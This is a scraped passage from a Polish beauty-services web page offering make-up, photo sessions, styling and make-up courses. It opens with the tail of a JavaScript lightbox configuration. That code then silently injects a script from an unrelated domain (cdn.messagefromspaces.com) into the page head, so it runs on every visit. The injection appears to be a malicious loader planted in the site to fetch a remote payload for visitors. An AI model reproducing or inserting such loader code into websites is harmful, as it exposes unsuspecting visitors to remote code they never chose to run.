, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
 • Makijaż (Dzienny, Wieczorowy, Ślubny, Fotograficzny)


  W ramach naszych usług oferujemy także makijaż na każdą okazję! Wiemy, jak istotne jest, by czuć się pięknie w ważnym dla nas dniu, dlatego doradzimy, dobierzemy i dopasujemy makijaż do wydarzenia, okazji, a nawet stroju.
 • Organizacja sesji zdjęciowych

  Sesje zdjęciowe to nie tylko świetna pamiątka, ale także idealny sposób na spędzenie kreatywnego czasu z przyjaciółmi. Jeśli powierzycie nam swój czas, odnajdziemy idealną scenerię, zaplanujemy ciekawe zdjęcia. Spełnimy Wasze oczekiwania zarówno w organizowaniu sesji prywatnych jak i biznesowych.
 • Stylizacja

  Potrzebujesz wsparcia w wyborze kreacji? Nie wiesz, w co się ubrać by wszystkich zachwycić, wpasować się w otoczenie lub po prostu dobrze się czuć? Chętnie pomożemy i wspólnie wybierzemy coś, w czym będziesz czuł się najlepiej!
 • Szkolenia


  Jeśli chcesz nauczyć się podstawowych technik makijażu, lub czegoś więcej. Dobrze trafiłeś. Szkolenia zarówno idywidualne lub dla zorganizowanych grup